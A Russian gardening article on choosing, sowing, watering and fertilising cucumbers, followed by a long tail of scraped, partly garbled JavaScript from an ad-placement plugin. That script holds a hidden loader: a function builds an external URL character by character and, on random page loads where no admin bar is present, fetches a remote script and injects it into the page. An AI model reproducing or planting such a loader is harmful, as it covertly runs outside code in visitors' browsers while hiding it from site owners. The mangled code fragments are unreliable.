Для посадки как в открытом грунте так и в условиях теплиц рекомендуются пчелоопыляемые сорта и гибриды: Домовенок F1, Детки на ветке F1, Куманек F1, Лебелле F1, Лорд F1, Родничок, Атлет, Аппетитный, Засолочный.

Гибриды

В условиях промышленной селекции огурцов, с заранее указанными качествами, производство гибридов сегодня вышло на более высокий уровень. Однако несмотря на то, что удалось создать огурцы с небольшой горечью, высокими вкусовыми качествами и устойчивостью к болезням, гибриды не сохраняют во втором поколении устойчивых признаков сорта. Это означает, что огороднику придется ежегодно покупать новый семенной материал, стоимость которого иногда достаточно велика.

Несмотря на это гибридные формы отлично справляются с задачей получения высокого урожая, как для открытого грунта так и для теплиц и парников.

Экзотические

Момордику, китайский острый огурец, армянский огурец, огурец-лимон, чайот, мелотрия шершавая, кивано — все эти названия пока малоизвестны большинству огородников, но, тем не менее, это тоже огурцы. И хотя они требуют специального ухода и условий выращивания, такие разновидности все больше завоевывают популярность у любителей экспериментов и экзотических овощей.

Особенности выращивания огурцов и правила ухода

Для получения урожая на приусадебном участке используются посадки огурцов рассадным и безрассадным способом. Сорта огурцов подбираются по типу опыляемости и срокам созревания.

Если позволяет участок, то рекомендуется использовать лучшие сорта огурцов с разными сроками созревания. Так появляется возможность увеличить период сбора урожая от самого раннего до поздних сортов.

Выбор места для грядки

Средняя температура, которая считается оптимальной для роста огурцов, должна быть выше +15 градусов, а почва должна прогреться минимум до +14 °С.

Огурцы не прихотливы к грунту, но лучшие всходы и урожаи получаются на почвах богатых гумусом. Отлично отзываются огурцы и на внесение органических удобрений, особенно если это делается системно — при осенней подготовке почвы и перед посадкой весной.

Для повышения урожайности рекомендуется проводить севооборот — на участке под огурцы рекомендуется 2-3 года выращивать бобовые, томаты, ранний картофель, кукурузу. На одном и том же участке отводить грядки под огурцы рекомендуется не раньше, чем через 5 лет после предыдущей посадки.

Внимание! Следует знать, что если предстоит выбирать огурцы и семена, лучшие сорта представлены в каталогах ведущих мировых агрофирм. В данном случае известность бренда будет гарантией качества посевного материала.

Рассадный и безрассадный способы

При безрассадном способе посадки семена сеются в подготовленную почву на грядку, а при выращивании рассады для проращивания семян используются торфяные стаканчики.

При выращивании рассадным способом есть возможность получить урожай на 1,5-2 недели раньше, чем при посадке непосредственно в грунт. Пророщенные и закаленные растения в возрасте 2-3 недель вместе с торфяными горшочками с 3 настоящими листиками высаживают в грунт при соответствующей температуре.

При посадке семян в открытый грунт почва предварительно вскапывается, рыхлится и удобряется компостом или органическими удобрениями. После посадки ряды рекомендуется укрыть агроволокном. При использовании опор посадка делается рядами, чтобы полоса междурядья была 50-70 см. Посев делается на глубину в 2-3 см, между семенами рекомендуется придерживаться расстояния 10-15 см.

Совет! Даже самые лучшие семена огурцов перед посадкой рекомендуется подержать в растворе стимулятора роста — так происходит насыщение семян полезными веществами.

Правила полива, рыхления

Полив грядок рекомендуется делать комнатной водой, потому что огурцы теплолюбивые растения, а холодная вода негативно сказывается на росте всходов. С появлением первых росточков землю аккуратно рыхлят. Полив осуществляется 1 раз в 2-3 дня.

После того как будет выпушен стебель, полив осуществляется 1 раз в 3-4 дня под корень, а рыхление необходимо делать уже на следующий день. Рекомендуется мульчировать землю возле корня, это способствует сохранению влаги.

  • Во время цветения рекомендуется делать полив 1 раз в 4-5 дней.
  • Во время плодоношения режим меняется, теперь поливать нужно 1 раз в 2-3 дня, во второй половине дня после того, как дневная жара спадет.

Удобрения

Подкормка раствором органических удобрений делается через 2-3 недели после всходов, чтобы ускорить рост побегов и увеличить интенсивность цветения. Использование минеральных удобрений типа суперфосфата, мочевины, сульфата калия строго по инструкции, осторожно, чтобы не повредить корневую систему.

Рекомендуется во время плодоношения использовать для подкормки комплексные удобрения (подойдут Идеал, Плодородие, Эра).

В период плодоношения внимательно нужно следить за состоянием растений, с появлением признаков поражения мучнистой росой, при пожелтении листьев и деформации плодов немедленно принимать меры к обработке пораженных растений иммуностимулирующими препаратами.

Популярные сорта огурцов

Для приусадебного участка рекомендуется использовать лучшие сорта огурцов, проверенные временем и рекомендованные ведущими производителями:

  • для консервирования и засолки подойдут Нежинский, Муромский, Береговой;
  • в качестве салатных и сортов универсального назначения стоит обратить внимание на названия Капелька, Конкурент, Алтай;
  • для консервирования и засолки подойдут гибриды: Мурашка F1, Родничок F1, Застольный F1.

Опытные огородники рекомендуют не только доверяться собственному опыту, но и изучить описание разных огурцов. И хотя, какой сорт или гибрид выбрать, зависит только от дачника, все же всестороннее изучение информации часто помогает организовать правильный уход за растениями.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};